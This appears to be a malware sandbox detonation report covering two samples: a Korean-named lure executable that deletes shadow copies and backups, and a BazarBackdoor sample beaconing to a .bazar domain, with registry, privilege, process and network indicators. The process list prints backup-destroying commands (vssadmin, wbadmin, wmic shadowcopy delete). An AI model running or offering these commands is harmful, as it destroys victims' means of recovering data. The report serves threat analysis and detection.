| File opened for modification | C:\Program Files\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\DSCResources\fr-FR\PackageManagementDscUtilities.strings.psd1 | C:\Users\Admin\AppData\Local\Temp\전산 및 비전산자료 보존 요청서(20200525)_꼭 확인하시고 자료보존해주세요1.exe | N/A |
Browser Information Discovery
Program crash
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\전산 및 비전산자료 보존 요청서(20200525)_꼭 확인하시고 자료보존해주세요1.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\전산 및 비전산자료 보존 요청서(20200525)_꼭 확인하시고 자료보존해주세요1.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\전산 및 비전산자료 보존 요청서(20200525)_꼭 확인하시고 자료보존해주세요1.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\전산 및 비전산자료 보존 요청서(20200525)_꼭 확인하시고 자료보존해주세요1.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\전산 및 비전산자료 보존 요청서(20200525)_꼭 확인하시고 자료보존해주세요1.exe | N/A |
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 | C:\Windows\System32\vds.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName | C:\Windows\System32\vds.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 | C:\Windows\System32\vds.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName | C:\Windows\System32\vds.exe | N/A |
Interacts with shadow copies
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\vssadmin.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\전산 및 비전산자료 보존 요청서(20200525)_꼭 확인하시고 자료보존해주세요1.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\전산 및 비전산자료 보존 요청서(20200525)_꼭 확인하시고 자료보존해주세요1.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A |
| Token: SeAuditPrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\wbengine.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\wbengine.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\wbengine.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3504 wrote to memory of 3744 | N/A | C:\Users\Admin\AppData\Local\Temp\전산 및 비전산자료 보존 요청서(20200525)_꼭 확인하시고 자료보존해주세요1.exe | C:\Windows\system32\cmd.exe |
| PID 3504 wrote to memory of 3744 | N/A | C:\Users\Admin\AppData\Local\Temp\전산 및 비전산자료 보존 요청서(20200525)_꼭 확인하시고 자료보존해주세요1.exe | C:\Windows\system32\cmd.exe |
| PID 3744 wrote to memory of 2372 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\vssadmin.exe |
| PID 3744 wrote to memory of 2372 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\vssadmin.exe |
| PID 3744 wrote to memory of 3512 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\wbadmin.exe |
| PID 3744 wrote to memory of 3512 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\wbadmin.exe |
| PID 3744 wrote to memory of 952 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\Wbem\WMIC.exe |
| PID 3744 wrote to memory of 952 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\Wbem\WMIC.exe |
Uses Task Scheduler COM API
Uses Volume Shadow Copy service COM API
Processes
C:\Users\Admin\AppData\Local\Temp\전산 및 비전산자료 보존 요청서(20200525)_꼭 확인하시고 자료보존해주세요1.exe
"C:\Users\Admin\AppData\Local\Temp\전산 및 비전산자료 보존 요청서(20200525)_꼭 확인하시고 자료보존해주세요1.exe"
C:\Users\Admin\AppData\Local\Temp\전산 및 비전산자료 보존 요청서(20200525)_꼭 확인하시고 자료보존해주세요1.exe
"C:\Users\Admin\AppData\Local\Temp\전산 및 비전산자료 보존 요청서(20200525)_꼭 확인하시고 자료보존해주세요1.exe" n3504
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe"
C:\Windows\system32\vssadmin.exe
vssadmin delete shadows /all /quiet
C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
C:\Windows\system32\wbadmin.exe
wbadmin delete catalog -quiet
C:\Windows\system32\wbengine.exe
"C:\Windows\system32\wbengine.exe"
C:\Windows\System32\vdsldr.exe
C:\Windows\System32\vdsldr.exe -Embedding
C:\Windows\System32\vds.exe
C:\Windows\System32\vds.exe
C:\Windows\System32\Wbem\WMIC.exe
wmic shadowcopy delete
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 4484 -ip 4484
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4484 -s 752
C:\Users\Admin\AppData\Local\Temp\전산 및 비전산자료 보존 요청서(20200525)_꼭 확인하시고 자료보존해주세요1.exe
"C:\Users\Admin\AppData\Local\Temp\전산 및 비전산자료 보존 요청서(20200525)_꼭 확인하시고 자료보존해주세요1.exe" n3504
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 4348 -ip 4348
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4348 -s 768
C:\Users\Admin\AppData\Local\Temp\전산 및 비전산자료 보존 요청서(20200525)_꼭 확인하시고 자료보존해주세요1.exe
"C:\Users\Admin\AppData\Local\Temp\전산 및 비전산자료 보존 요청서(20200525)_꼭 확인하시고 자료보존해주세요1.exe" n3504
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 3324 -ip 3324
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3324 -s 772
C:\Users\Admin\AppData\Local\Temp\전산 및 비전산자료 보존 요청서(20200525)_꼭 확인하시고 자료보존해주세요1.exe
"C:\Users\Admin\AppData\Local\Temp\전산 및 비전산자료 보존 요청서(20200525)_꼭 확인하시고 자료보존해주세요1.exe" n3504
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 4388 -ip 4388
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4388 -s 652
C:\Users\Admin\AppData\Local\Temp\전산 및 비전산자료 보존 요청서(20200525)_꼭 확인하시고 자료보존해주세요1.exe
"C:\Users\Admin\AppData\Local\Temp\전산 및 비전산자료 보존 요청서(20200525)_꼭 확인하시고 자료보존해주세요1.exe" n3504
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 71.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | iplogger.org | udp |
| US | 104.26.3.46:443 | iplogger.org | tcp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| GB | 142.250.200.3:80 | c.pki.goog | tcp |
| US | 8.8.8.8:53 | 3.200.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 46.3.26.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 200.163.202.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.190.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 30.243.111.52.in-addr.arpa | udp |
Files
memory/3504-3-0x0000000000400000-0x000000000041F000-memory.dmp
memory/3504-2-0x0000000002440000-0x000000000244B000-memory.dmp
memory/3504-1-0x0000000000850000-0x0000000000950000-memory.dmp
memory/3504-4798-0x0000000000400000-0x000000000083C000-memory.dmp
memory/3504-6413-0x0000000000850000-0x0000000000950000-memory.dmp
memory/3504-7181-0x0000000002440000-0x000000000244B000-memory.dmp
memory/3504-8604-0x0000000000400000-0x000000000041F000-memory.dmp
memory/4484-9621-0x0000000000400000-0x000000000083C000-memory.dmp
memory/3504-13624-0x0000000000400000-0x000000000083C000-memory.dmp
memory/3504-16279-0x0000000000400000-0x000000000083C000-memory.dmp
memory/4484-16281-0x0000000000400000-0x000000000083C000-memory.dmp
memory/3504-16333-0x0000000000400000-0x000000000083C000-memory.dmp
memory/4348-16334-0x0000000000400000-0x000000000083C000-memory.dmp
memory/4348-16339-0x0000000000400000-0x000000000083C000-memory.dmp
memory/3504-16416-0x0000000000400000-0x000000000083C000-memory.dmp
memory/3324-16418-0x0000000000400000-0x000000000083C000-memory.dmp
memory/3324-16423-0x0000000000400000-0x000000000083C000-memory.dmp
memory/3504-16492-0x0000000000400000-0x000000000083C000-memory.dmp
memory/4388-16494-0x0000000000400000-0x000000000083C000-memory.dmp
memory/4388-16498-0x0000000000400000-0x000000000083C000-memory.dmp
Analysis: behavioral6
Detonation Overview
Submitted
2024-12-04 19:31
Reported
2024-12-04 19:36
Platform
win10v2004-20241007-en
Max time kernel
141s
Max time network
152s
Command Line
Signatures
BazarBackdoor
| Description | Indicator | Process | Target |
| N/A | younika-hayde.bazar | N/A | N/A |
| N/A | younika-hayde.bazar | N/A | N/A |
| N/A | younika-hayde.bazar | N/A | N/A |
| N/A | younika-hayde.bazar | N/A | N/A |
| N/A | younika-hayde.bazar | N/A | N/A |
| N/A | younika-hayde.bazar | N/A | N/A |
| N/A | younika-hayde.bazar | N/A | N/A |
| N/A | younika-hayde.bazar | N/A | N/A |
| N/A | younika-hayde.bazar | N/A | N/A |
| N/A | younika-hayde.bazar | N/A | N/A |
| N/A | younika-hayde.bazar | N/A | N/A |
| N/A | younika-hayde.bazar | N/A | N/A |
| N/A | younika-hayde.bazar | N/A | N/A |
| N/A | younika-hayde.bazar | N/A | N/A |
| N/A | younika-hayde.bazar | N/A | N/A |
| N/A | younika-hayde.bazar | N/A | N/A |
| N/A | younika-hayde.bazar | N/A | N/A |
| N/A | younika-hayde.bazar | N/A | N/A |
| N/A | younika-hayde.bazar | N/A | N/A |
| N/A | younika-hayde.bazar | N/A | N/A |
| N/A | younika-hayde.bazar | N/A | N/A |
| N/A | younika-hayde.bazar | N/A | N/A |
| N/A | younika-hayde.bazar | N/A | N/A |
| N/A | younika-hayde.bazar | N/A | N/A |
| N/A | younika-hayde.bazar | N/A | N/A |
| N/A | younika-hayde.bazar | N/A | N/A |
| N/A | younika-hayde.bazar | N/A | N/A |
| N/A | younika-hayde.bazar | N/A | N/A |
| N/A | younika-hayde.bazar | N/A | N/A |
| N/A | younika-hayde.bazar | N/A | N/A |
| N/A | younika-hayde.bazar | N/A | N/A |
| N/A | younika-hayde.bazar | N/A | N/A |
| N/A | younika-hayde.bazar | N/A | N/A |
| N/A | younika-hayde.bazar | N/A | N/A |
| N/A | younika-hayde.bazar | N/A | N/A |
| N/A | younika-hayde.bazar | N/A | N/A |
| N/A | younika-hayde.bazar | N/A | N/A |
| N/A | younika-hayde.bazar | N/A | N/A |
| N/A | younika-hayde.bazar | N/A | N/A |
| N/A | younika-hayde.bazar | N/A | N/A |
| N/A | younika-hayde.bazar | N/A | N/A |
| N/A | younika-hayde.bazar | N/A | N/A |
| N/A | younika-hayde.bazar | N/A | N/A |
| N/A | younika-hayde.bazar | N/A | N/A |
| N/A | younika-hayde.bazar | N/A | N/A |
| N/A | younika-hayde.bazar | N/A | N/A |
| N/A | younika-hayde.bazar | N/A | N/A |
| N/A | younika-hayde.bazar | N/A | N/A |
| N/A | younika-hayde.bazar | N/A | N/A |
| N/A | younika-hayde.bazar | N/A | N/A |
| N/A | younika-hayde.bazar | N/A | N/A |
| N/A | younika-hayde.bazar | N/A | N/A |
| Key created | \REGISTRY\MACHINE\Software\Microsoft\SystemCertificates\Root | C:\Users\Admin\AppData\Local\Temp\f4f47c67be61d386e7d757ff89825fa630dd5cc4ed600b5471f9cc18c21e983f.exe | N/A |
| N/A | younika-hayde.bazar | N/A | N/A |
| N/A | younika-hayde.bazar | N/A | N/A |
| N/A | younika-hayde.bazar | N/A | N/A |
| N/A | younika-hayde.bazar | N/A | N/A |
| N/A | younika-hayde.bazar | N/A | N/A |
| N/A | younika-hayde.bazar | N/A | N/A |
| N/A | younika-hayde.bazar | N/A | N/A |
| N/A | younika-hayde.bazar | N/A | N/A |
| N/A | younika-hayde.bazar | N/A | N/A |
| N/A | younika-hayde.bazar | N/A | N/A |
| N/A | younika-hayde.bazar | N/A | N/A |
Bazarbackdoor family
Tries to connect to .bazar domain
| Description | Indicator | Process | Target |
| N/A | younika-hayde.bazar | N/A | N/A |
| N/A | younika-hayde.bazar | N/A | N/A |
| N/A | younika-hayde.bazar | N/A | N/A |
| N/A | younika-hayde.bazar | N/A | N/A |
| N/A | younika-hayde.bazar | N/A | N/A |
| N/A | younika-hayde.bazar | N/A | N/A |
| N/A | younika-hayde.bazar | N/A | N/A |
| N/A | younika-hayde.bazar | N/A | N/A |
| N/A | younika-hayde.bazar | N/A | N/A |
| N/A | younika-hayde.bazar | N/A | N/A |
| N/A | younika-hayde.bazar | N/A | N/A |
| N/A | younika-hayde.bazar | N/A | N/A |
| N/A | younika-hayde.bazar | N/A | N/A |
| N/A | younika-hayde.bazar | N/A | N/A |
| N/A | younika-hayde.bazar | N/A | N/A |
| N/A | younika-hayde.bazar | N/A | N/A |
| N/A | younika-hayde.bazar | N/A | N/A |
| N/A | younika-hayde.bazar | N/A | N/A |
| N/A | younika-hayde.bazar | N/A | N/A |
| N/A | younika-hayde.bazar | N/A | N/A |
| N/A | younika-hayde.bazar | N/A | N/A |
| N/A | younika-hayde.bazar | N/A | N/A |
| N/A | younika-hayde.bazar | N/A | N/A |
| N/A | younika-hayde.bazar | N/A | N/A |
| N/A | younika-hayde.bazar | N/A | N/A |
| N/A | younika-hayde.bazar | N/A | N/A |
| N/A | younika-hayde.bazar | N/A | N/A |
| N/A | younika-hayde.bazar | N/A | N/A |
| N/A | younika-hayde.bazar | N/A | N/A |
| N/A | younika-hayde.bazar | N/A | N/A |
| N/A | younika-hayde.bazar | N/A | N/A |
| N/A | younika-hayde.bazar | N/A | N/A |
| N/A | younika-hayde.bazar | N/A | N/A |
| N/A | younika-hayde.bazar | N/A | N/A |
| N/A | younika-hayde.bazar | N/A | N/A |
| N/A | younika-hayde.bazar | N/A | N/A |
| N/A | younika-hayde.bazar | N/A | N/A |
| N/A | younika-hayde.bazar | N/A | N/A |
| N/A | younika-hayde.bazar | N/A | N/A |
| N/A | younika-hayde.bazar | N/A | N/A |
| N/A | younika-hayde.bazar | N/A | N/A |
| N/A | younika-hayde.bazar | N/A | N/A |
| N/A | younika-hayde.bazar | N/A | N/A |
| N/A | younika-hayde.bazar | N/A | N/A |
| N/A | younika-hayde.bazar | N/A | N/A |
| N/A | younika-hayde.bazar | N/A | N/A |
| N/A | younika-hayde.bazar | N/A | N/A |
| N/A | younika-hayde.bazar | N/A | N/A |
| N/A | younika-hayde.bazar | N/A | N/A |
| N/A | younika-hayde.bazar | N/A | N/A |
| N/A | younika-hayde.bazar | N/A | N/A |
| N/A | younika-hayde.bazar | N/A | N/A |
| N/A | younika-hayde.bazar | N/A | N/A |
| N/A | younika-hayde.bazar | N/A | N/A |
| N/A | younika-hayde.bazar | N/A | N/A |
| N/A | younika-hayde.bazar | N/A | N/A |
| N/A | younika-hayde.bazar | N/A | N/A |
| N/A | younika-hayde.bazar | N/A | N/A |
| N/A | younika-hayde.bazar | N/A | N/A |
| N/A | younika-hayde.bazar | N/A | N/A |
| N/A | younika-hayde.bazar | N/A | N/A |
| N/A | younika-hayde.bazar | N/A | N/A |
| N/A | younika-hayde.bazar | N/A | N/A |
| N/A | younika-hayde.bazar | N/A | N/A |
Unexpected DNS network traffic destination
| Description | Indicator | Process | Target |
| Destination IP | 172.104.136.243 | N/A | N/A |
| Destination IP | 212.24.98.54 | N/A | N/A |
| Destination IP | 163.172.185.51 | N/A | N/A |
| Destination IP | 63.231.92.27 | N/A | N/A |
| Destination IP | 128.52.130.209 | N/A | N/A |
| Destination IP | 107.172.42.186 | N/A | N/A |
| Destination IP | 31.171.251.118 | N/A | N/A |
| Destination IP | 51.254.25.115 | N/A | N/A |
| Destination IP | 139.99.96.146 | N/A | N/A |
| Destination IP | 198.251.90.143 | N/A | N/A |
| Destination IP | 159.89.249.249 | N/A | N/A |
| Destination IP | 193.183.98.66 | N/A | N/A |
| Destination IP | 142.4.204.111 | N/A | N/A |
| Destination IP | 96.47.228.108 | N/A | N/A |
| Destination IP | 87.98.175.85 | N/A | N/A |
| Destination IP | 158.69.239.167 | N/A | N/A |
| Destination IP | 46.28.207.199 | N/A | N/A |
| Destination IP | 87.98.175.85 | N/A | N/A |
| Destination IP | 111.67.20.8 | N/A | N/A |
| Destination IP | 139.59.23.241 | N/A | N/A |
| Destination IP | 139.59.208.246 | N/A | N/A |
| Destination IP | 185.117.154.144 | N/A | N/A |
| Destination IP | 92.222.97.145 | N/A | N/A |
| Destination IP | 35.196.105.24 | N/A | N/A |
| Destination IP | 172.98.193.42 | N/A | N/A |
| Destination IP | 217.12.210.54 | N/A | N/A |
| Destination IP | 167.99.153.82 | N/A | N/A |
| Destination IP | 91.217.137.37 | N/A | N/A |
| Destination IP | 50.3.82.215 | N/A | N/A |
| Destination IP | 188.165.200.156 | N/A | N/A |
| Destination IP | 77.73.68.161 | N/A | N/A |
| Destination IP | 66.70.211.246 | N/A | N/A |
| Destination IP | 51.254.25.115 | N/A | N/A |
| Destination IP | 193.183.98.66 | N/A | N/A |
| Destination IP | 82.196.9.45 | N/A | N/A |
| Destination IP | 138.197.25.214 | N/A | N/A |
| Destination IP | 185.121.177.177 | N/A | N/A |
| Destination IP | 104.238.186.189 | N/A | N/A |
| Destination IP | 178.17.170.179 | N/A | N/A |
| Destination IP | 45.63.124.65 | N/A | N/A |
| Destination IP | 104.37.195.178 | N/A | N/A |
| Destination IP | 192.99.85.244 | N/A | N/A |
| Destination IP | 185.208.208.141 | N/A | N/A |
| Destination IP | 5.45.97.127 | N/A | N/A |
| Destination IP | 5.132.191.104 | N/A | N/A |
| Destination IP | 45.32.160.206 | N/A | N/A |
| Destination IP | 5.135.183.146 | N/A | N/A |
| Destination IP | 142.4.205.47 | N/A | N/A |
| Destination IP | 89.18.27.167 | N/A | N/A |
| Destination IP | 162.248.241.94 | N/A | N/A |
| Destination IP | 144.76.133.38 | N/A | N/A |
| Destination IP | 51.255.211.146 | N/A | N/A |
| Destination IP | 163.53.248.170 | N/A | N/A |
| Destination IP | 45.71.112.70 | N/A | N/A |
| Destination IP | 146.185.176.36 | N/A | N/A |
| Destination IP | 89.35.39.64 | N/A | N/A |
| Destination IP | 46.101.70.183 | N/A | N/A |
| Destination IP | 94.177.171.127 | N/A | N/A |
| Destination IP | 130.255.78.223 | N/A | N/A |
| Destination IP | 147.135.185.78 | N/A | N/A |
| Destination IP | 91.217.137.37 | N/A | N/A |
| Destination IP | 185.164.136.225 | N/A | N/A |
| Destination IP | 69.164.196.21 | N/A | N/A |
| Destination IP | 169.239.202.202 | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| HTTP URL | https://api.opennicproject.org/geoip/ | N/A | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\f4f47c67be61d386e7d757ff89825fa630dd5cc4ed600b5471f9cc18c21e983f.exe
"C:\Users\Admin\AppData\Local\Temp\f4f47c67be61d386e7d757ff89825fa630dd5cc4ed600b5471f9cc18c21e983f.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 104.219.191.52.in-addr.arpa | udp |
| RO | 85.204.116.188:443 | tcp | |
| US | 8.8.8.8:53 | 181.129.81.91.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 64.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| RO | 86.104.194.109:443 | tcp | |
| US | 8.8.8.8:53 | 56.163.245.4.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 69.190.18.2.in-addr.arpa | udp |
| RU | 194.87.145.86:443 | tcp | |
| RU | 194.87.145.86:443 | tcp | |
| RU | 194.87.145.86:443 | tcp | |
| BA | 185.99.2.221:443 | tcp | |
| US | 8.8.8.8:53 | 86.145.87.194.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 83.210.23.2.in-addr.arpa | udp |
| DE | 5.1.81.68:443 | tcp | |
| BA | 185.164.32.148:443 | tcp | |
| US | 8.8.8.8:53 | 43.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | api.opennicproject.org | udp |
| DE | 116.203.98.109:443 | api.opennicproject.org | tcp |
| FR | 51.254.25.115:53 | younika-hayde.bazar | udp |
| IT | 193.183.98.66:53 | younika-hayde.bazar | udp |
| RU | 91.217.137.37:53 | younika-hayde.bazar | udp |
| US | 8.8.8.8:53 | 115.25.254.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 66.98.183.193.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 109.98.203.116.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 37.137.217.91.in-addr.arpa | udp |
| FR | 87.98.175.85:53 | younika-hayde.bazar | udp |
| AT | 185.121.177.177:53 | younika-hayde.bazar | udp |
| US | 8.8.8.8:53 | 85.175.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 177.177.121.185.in-addr.arpa | udp |
| ZA | 169.239.202.202:53 | younika-hayde.bazar | udp |
| US | 198.251.90.143:53 | younika-hayde.bazar | udp |
| US | 8.8.8.8:53 | 202.202.239.169.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 143.90.251.198.in-addr.arpa | udp |
| AT | 5.132.191.104:53 | younika-hayde.bazar | udp |
| AU | 111.67.20.8:53 | younika-hayde.bazar | udp |
| US | 8.8.8.8:53 | 8.20.67.111.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 104.191.132.5.in-addr.arpa | udp |
| AU | 163.53.248.170:53 | younika-hayde.bazar | udp |
| CA | 142.4.204.111:53 | younika-hayde.bazar | udp |
| CA | 142.4.205.47:53 | younika-hayde.bazar | udp |
| US | 8.8.8.8:53 | 47.205.4.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 111.204.4.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 170.248.53.163.in-addr.arpa | udp |
| CA | 158.69.239.167:53 | younika-hayde.bazar | udp |
| CA | 104.37.195.178:53 | younika-hayde.bazar | udp |
| US | 8.8.8.8:53 | 178.195.37.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 167.239.69.158.in-addr.arpa | udp |
| CA | 192.99.85.244:53 | younika-hayde.bazar | udp |
| CA | 158.69.160.164:53 | younika-hayde.bazar | udp |
| CH | 46.28.207.199:53 | younika-hayde.bazar | udp |
| US | 8.8.8.8:53 | 244.85.99.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 164.160.69.158.in-addr.arpa | udp |
| CH | 31.171.251.118:53 | younika-hayde.bazar | udp |
| CZ | 81.2.241.148:53 | younika-hayde.bazar | udp |
| US | 8.8.8.8:53 | 118.251.171.31.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 148.241.2.81.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 199.207.28.46.in-addr.arpa | udp |
| FR | 51.254.25.115:53 | younika-hayde.bazar | udp |
| DE | 82.141.39.32:53 | younika-hayde.bazar | udp |
| DE | 50.3.82.215:53 | younika-hayde.bazar | udp |
| DE | 46.101.70.183:53 | younika-hayde.bazar | udp |
| DE | 5.45.97.127:53 | younika-hayde.bazar | udp |
| DE | 130.255.78.223:53 | younika-hayde.bazar | udp |
| US | 8.8.8.8:53 | 32.39.141.82.in-addr.arpa | udp |
